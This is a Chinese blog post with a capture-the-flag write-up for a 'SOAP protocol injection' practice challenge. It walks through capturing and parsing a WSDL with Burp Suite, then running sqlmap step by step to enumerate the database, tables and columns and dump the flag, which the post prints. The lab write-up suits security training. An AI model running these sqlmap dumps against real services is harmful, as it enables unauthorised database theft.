0
点赞
收藏
分享

微信扫一扫

安鸾_soap协议注入

八怪不姓丑 2022-04-29 阅读 83
网络安全

靶场地址:初始化数据库

  • 解题思路:    
    1.soap协议是一种基于xml语言的数据规范,只要抓一个xml的数据包解析wsdl的数据包就能发现很多东西 
    2.把解析出来的wsdl数据包保存成一个文本然后放入sqlmap工具中跑一下就能发现注入点

解题步骤:

1.用burosuite抓包:http://47.103.94.191:8018/ws_soap.php?wsdl

2.右键点击parse wsdl,查看解析的包

3.将wsdl包保存一个1.txt文件,放入sqlmap中进行运行,发现有注入点

 4.爆库名:sqlmap.py -r C:\Users\Administrator\Desktop\1.txt --time-sec=2 --current-db

5.爆表名:sqlmap.py -r C:\Users\Administrator\Desktop\1.txt --time-sec=2 -D whalwl --tables

 6.爆列名: 

sqlmap.py -r C:\Users\Administrator\Desktop\1.txt --time-sec=2 -D whalwl -T this_flag --columns

7.爆flag:sqlmap.py -r C:\Users\Administrator\Desktop\1.txt --time-sec=2 -D whalwl -T this_flag -C flag --dump

最后结果为: flag{ba8b6a6f6e38ed7e173d03504132dbe8}

举报

相关推荐

0 条评论